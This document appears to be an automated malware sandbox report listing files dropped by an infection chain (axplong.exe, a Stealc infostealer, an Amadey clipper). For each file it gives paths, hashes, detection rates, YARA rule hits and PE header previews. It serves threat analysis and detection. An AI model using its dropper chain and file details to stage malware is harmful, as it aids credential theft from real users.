                                                                                                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5164032
                                                                                                                                                                                                                                                  Entropy (8bit):5.527945651107689
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:C3ar34dAX4N4GadW7NMdrFq+Sj305R6BrOBU/B6:C3ar34dAX4N4GaINeFq+Sj30grsG6
                                                                                                                                                                                                                                                  MD5:AC83F35170E7E84000CC5A17472BE30B
                                                                                                                                                                                                                                                  SHA1:21338733185CD448038415401DF35AC859FD9786
                                                                                                                                                                                                                                                  SHA-256:840EB3AD83C9B698C00B959FF21B69BF8A7623CF3089DE64CA62F76D3D212248
                                                                                                                                                                                                                                                  SHA-512:36346D1CB124EBBCEC4B4733DC28B37BCF376802345024DEFB0CF51154C4C30514C7FFD66A2BB615660D5BEF501F3120A5456808B2A4DE0882677C925D292A4D
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................O.....b.O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...fhrhjlue..*...$...*...$.............@...cszsfekv......N.......N.............@....taggant.0....N.."....N.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1001527001\legs.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):776832
                                                                                                                                                                                                                                                  Entropy (8bit):7.8597230357066845
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXmAuuweJH9RKC6cmulcfJbBiv0V:pG+XeJH9Rp6RtfNLtcXeJH9Rp6RtfNLr
                                                                                                                                                                                                                                                  MD5:75CF470500D65CE4411790E09E650806
                                                                                                                                                                                                                                                  SHA1:91ACA1838BC6E3868D25E44308F58124B749167D
                                                                                                                                                                                                                                                  SHA-256:F29A920DD390574C50DF03E8F909A8F81A1894AF912AF2D92A9BAF4B57CF1C04
                                                                                                                                                                                                                                                  SHA-512:1C281FE53742A338BECB9AA4EFD2A7E418A66949A7F3D156440E02E2351548F6FF0EAD5D93AAE157509F57D0B4CC3584A9AB623C6446EA389B45B49D0DF85C48
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1004899001\am209.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):439808
                                                                                                                                                                                                                                                  Entropy (8bit):6.48944055080441
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:as9C0eaieHm71o2pL2IMJDoMc2ZNu5GQpsnp/yFPMsXnQODVNIg+cTtgJ7AO+Zj5:as9C0eaieHmO292D3//yFPMsXkJ7gmk
                                                                                                                                                                                                                                                  MD5:CE27255F0EF33CE6304E54D171E6547C
                                                                                                                                                                                                                                                  SHA1:E594C6743D869C852BF7A09E7FE8103B25949B6E
                                                                                                                                                                                                                                                  SHA-256:82C683A7F6E0B4A99A6D3AB519D539A3B0651953C7A71F5309B9D08E4DAA7C3C
                                                                                                                                                                                                                                                  SHA-512:96CFAFBAB9138517532621D0B5F3D4A529806CFDF6191C589E6FB6EBF471E9DF0777FB74E9ABBFE4E8CD8821944AD02B1F09775195E190EE8CA5D3FD151D20D9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L...Q.-g.........................................@..........................0............@.................................@E...................................E......8...............................@...............<............................text............................... ..`.rdata..PH.......J..................@..@.data....m...`...,...B..............@....rsrc................n..............@..@.reloc...E.......F...p..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):245760
                                                                                                                                                                                                                                                  Entropy (8bit):6.574504597316098
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:skv0eu6ZJlctXwLISyqlsxfKPkAck1gD1l567pGDUJ42pUvp85lmv6RReHeP3Kqc:/MeNRFLIu5ckeHgFGD+jpUvwzzeot+
                                                                                                                                                                                                                                                  MD5:89AD45B4A0E2D547C1E09D0A1EA94DF6
                                                                                                                                                                                                                                                  SHA1:CA32C2E492BB6D0753AAB59993380DB79B080740
                                                                                                                                                                                                                                                  SHA-256:18F4E82898557BA7F23F5B58E181793AEE6B9EE066258CE0B8FDBA63A714C4F8
                                                                                                                                                                                                                                                  SHA-512:22C575D47780046D845E0C383BF02ADED47D2813173EA6F07180F8726BE42084336EF5009C34C5C8295D0DEDDB3F19F6E5FEE1902D62AC9499A117E7DE59C4FF
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: infostealer_win_stealc_str_oct24, Description: Finds Stealc standalone samples (or dumps) based on the strings, Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, Author: Sekoia.io
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L.....jg.....................F"...................@...........................%...........@.................................Lf..<.............................$.|<...................................................................................text............................... ..`.rdata..............................@..@.data....+!..p.......V..............@....reloc...]....$..^...b..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):926760
                                                                                                                                                                                                                                                  Entropy (8bit):7.729027880509905
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:X5hXYUUk5Q5rd8NhhG5Qdard8NhhG5Qdct:X5BYUUke5eh84aeh840
                                                                                                                                                                                                                                                  MD5:122570B1D9D8FA848F3BFE02A1AB1A7B
                                                                                                                                                                                                                                                  SHA1:D85F70BEA3BCCBB453C7A896DCA4F4CEBD206A25
                                                                                                                                                                                                                                                  SHA-256:924A0DD594A393ED59780A22F8AEFF387ECF69DB54BA4505E8691F611D5445C3
                                                                                                                                                                                                                                                  SHA-512:02F42619F45A038A15AC8C31DF6D126CF654E3ED0D7601D77A2266D4692D33A9C69E3E46CC4AC0B2807991DE4759436EA34AEBC171CD7EE663988B4D500C8FBE
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....og.................&...`.......n............@..........................`.......D....@.....................................<.......................(&......$'..................................8^..................p............................text...:$.......&.................. ..`.rdata.......@......................@..@.data....:...P...,...2..............@....tls.................^..............@....rsrc................`..............@..@.reloc..$'.......(...f..............@..B.bss................................@....bss.................F..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):824832
                                                                                                                                                                                                                                                  Entropy (8bit):7.823924318464353
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:wu4dP5M4Q2Mm+liZAjESlBkVcd8NhhG5MXNYliZAjESlBkVcd8NhhG5MXNT:l4dPpQPmord8NhhG5Mdard8NhhG5MdT
                                                                                                                                                                                                                                                  MD5:4F3C6C19B0078AFB9AC1E6D2CE6116E7
                                                                                                                                                                                                                                                  SHA1:1C033C45A569E76C5CBD737E2BBAE4804834A6B4
                                                                                                                                                                                                                                                  SHA-256:DC1C0E08CA598A43DFB1E6DDD4E87824A39FECCAB05A97A1FC6BD3D4C308817A
                                                                                                                                                                                                                                                  SHA-512:1DA756B733CE646D3784EC8A1A3D490209C0E7BA1282C5C8DF9AAEC3A2C73DD109D7BA423379B982D251AD5AA31EB08B98A6C98F7CE841A482D001C9638F0CD8
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....rg.................H........................@.......................................@.....................................(....@.......................P......................................@n.............. ...L............................text....G.......H.................. ..`.rdata.......`.......P..............@..@.data...."..........................@....tls.........0......................@....rsrc........@......................@..@.reloc.......P......................@..B.BSS.........p.......&..............@....BSS.........0......................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7833736
                                                                                                                                                                                                                                                  Entropy (8bit):5.960896721758829
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:vB6DGAe6ei93Aq7SrSLAFiyRMrqcHy/e8TRDh2lGcsl6BS/W7hlRSfYKRbpxPyzt:vB7m939hAMuM2cS/h1F2xDSqbKJyz82
                                                                                                                                                                                                                                                  MD5:66178E76829F947721EE5F995434D37F
                                                                                                                                                                                                                                                  SHA1:D4FF72A893EB3A70A8D3274289F014D338EBB249
                                                                                                                                                                                                                                                  SHA-256:4AA772539C101EEEA6CD0FECECAE92603738C59AFB7406D7B81B370313918F93
                                                                                                                                                                                                                                                  SHA-512:0C39CDE1DB094B22CCA8B3087DC5629C89D4F0EE3D9FEA89A9A6E57A4B6C1080C552830F6D53BF347D3B4E81DE047384365F8065561EF35D70A2D85047AFD5C2
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M..~w..2............M...@...........................x.....;.x...@... ..............................`t..-....................w.......t..K............................s......................ht. ............................text.....M.......M.................`..`.data.........M.......M.............@....rdata........^.......^.............@..@.eh_framdM....s..N....s.............@..@.bss.....1... t..........................idata...-...`t.......t.............@....CRT....0.....t......2t.............@....tls..........t......4t.............@....reloc...K....t..L...6t.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14379809
                                                                                                                                                                                                                                                  Entropy (8bit):7.995911957508085
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:393216:+SatYLywq3Obs2CliL2Vmd6m+c/ei7G99EqRNiIAqHEzo:+SaiLywq3ObRqiyVmd8uFAv4s
                                                                                                                                                                                                                                                  MD5:E8A21B7C1DBF57E585F28C10631647CF
                                                                                                                                                                                                                                                  SHA1:6C987EE295375682DFC8156895099EB7D6840148
                                                                                                                                                                                                                                                  SHA-256:C04B0AF794F5CBDF4D3051D95F829AE20BD856BE754ECBC4ABD3372E8434DA75
                                                                                                                                                                                                                                                  SHA-512:A92F782D8C12B816D6019327EA41A0A3DC9AC7C316C91B2F1650FCC6343FEBB6439E24DC7DCF677D722CF7A3273B7B182BA7A34EC9C9F6C7FD6D1F34F4A06727
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...d.wg.........."....).....l...... ..........@.........................................`.................................................4...x....p..h....@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...h....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5164032
                                                                                                                                                                                                                                                  Entropy (8bit):5.527945651107689
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:C3ar34dAX4N4GadW7NMdrFq+Sj305R6BrOBU/B6:C3ar34dAX4N4GaINeFq+Sj30grsG6
                                                                                                                                                                                                                                                  MD5:AC83F35170E7E84000CC5A17472BE30B
                                                                                                                                                                                                                                                  SHA1:21338733185CD448038415401DF35AC859FD9786
                                                                                                                                                                                                                                                  SHA-256:840EB3AD83C9B698C00B959FF21B69BF8A7623CF3089DE64CA62F76D3D212248
                                                                                                                                                                                                                                                  SHA-512:36346D1CB124EBBCEC4B4733DC28B37BCF376802345024DEFB0CF51154C4C30514C7FFD66A2BB615660D5BEF501F3120A5456808B2A4DE0882677C925D292A4D
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................O.....b.O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...fhrhjlue..*...$...*...$.............@...cszsfekv......N.......N.............@....taggant.0....N.."....N.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3277824
                                                                                                                                                                                                                                                  Entropy (8bit):6.665777492235047
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:QJoGB5k1VSBgkTXgyGp0d3WUQ5Ts8wRWAQ2Pyd5t:QcPOhUTs8wRLA5t
                                                                                                                                                                                                                                                  MD5:97AF5B90F7A80FC9629DD3A0D3DC92A8
                                                                                                                                                                                                                                                  SHA1:E2E2303C04C1A06473CAE325C373B8A398A312F6
                                                                                                                                                                                                                                                  SHA-256:54851114E60D122332CE48525C5923D93232F58509FB3DFA292B7CE49D2D7315
                                                                                                                                                                                                                                                  SHA-512:586849599813A97C5A6E3832D82C5067BD508CA3291DB08D12B77F903ADBDC1CA99F0BFCAAD857BCF631A3CEE3CB6141A38CA37CFDF6EE75CB80B6DEF363951C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................@2.....".3...@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...xsrqoxbv.P+......F+.................@...frrbcldo......2.......1.............@....taggant.0....2.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1960448
                                                                                                                                                                                                                                                  Entropy (8bit):7.941066059618813
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:lj7MqE7eEtF9gx8Od0qFSOdQvS5/3PAfgJ:htEyEhgx8N7ah4o
                                                                                                                                                                                                                                                  MD5:3D47CE3BB786721E47FC7C5FC4F3ECBE
                                                                                                                                                                                                                                                  SHA1:5F35D9FFF659166AFEB97185599B211FB344D772
                                                                                                                                                                                                                                                  SHA-256:C0743D1A2FBF9F2A9350AEF38169C6DA56B1A9C8ED08D0A35DABB7E29C7C19AC
                                                                                                                                                                                                                                                  SHA-512:E2658FE633DB0DEA8600458D3EABD3F3ED5B39B039C61E285401D0FC52EC0ED9076BFC59A63F86DEF5A132071CD94B21C3D48E4152A86EC1BED170126EF0824E
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................>....................@.........................................................................[.A.o.....@.....................................................D&...................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..*...A.....................@...jwcxmuyi......k.....................@...zcgagdls............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4494336
                                                                                                                                                                                                                                                  Entropy (8bit):7.987910112110911
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:QjXxyZzF5lVuN7/vL1fq+gQgv6VFHIYrMgiCO/IZFakE7c:QjXQjfVuxJi+gQgv4FB4giHwHa57
                                                                                                                                                                                                                                                  MD5:D6B0130E6CDD9D6FE53D0A4D23EA9CBD
                                                                                                                                                                                                                                                  SHA1:D35A79B64BB3BE4A14571BD00ECE5484BA8D6021
                                                                                                                                                                                                                                                  SHA-256:32B500200C202AB10AC18FA064B70FC7E6277DDCF3B927051FAE468B4C606A74
                                                                                                                                                                                                                                                  SHA-512:95332A22B4317B53476CA923E002D5E438F8F4DA623A44E65B0A6F355090D5D0FF2ECEB3E32499B2FFC4A1BAB1ABFC4EADACE88A47D82F1888DAF0D91E4CB8C9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...P........M...@..................................KE...@... ............................._.t.s.....t...............w......2..............................X2...................................................... . ..t.......(.................@....rsrc.........t.......(.............@....idata ......t.......(.............@... ..9...t.......(.............@...hnsygimb.....p........(.............@...kduywxtx.....@.......lD.............@....taggant.0...P..."...rD.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\ebjtOH70jl.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3267072
                                                                                                                                                                                                                                                  Entropy (8bit):6.72713315937738
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:ZNJgBn8wNcPJvBqIHt0AWLx5zLpBBYAzH1k4JE5ygxR6E3lQ:NgN8wkFBVHGbLx5zLBYQJEl768lQ
                                                                                                                                                                                                                                                  MD5:F775D21B5BFDE4169416087324A43543
                                                                                                                                                                                                                                                  SHA1:30DBFFDC709395BBD168AD9BEE1B17239AC31DBF
                                                                                                                                                                                                                                                  SHA-256:9B85AE26F1588D1238395258076430B282476882128AEEC79066BF10AF37D8E2
                                                                                                                                                                                                                                                  SHA-512:A793BFFD6AE99102848FD0BB3A93C47E4CA1BF3C69065458B82580D2537D3C0080DED014D2003892CA17F322D8F80833288D5A2C1D896A25D69FE68DF4B27BD9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
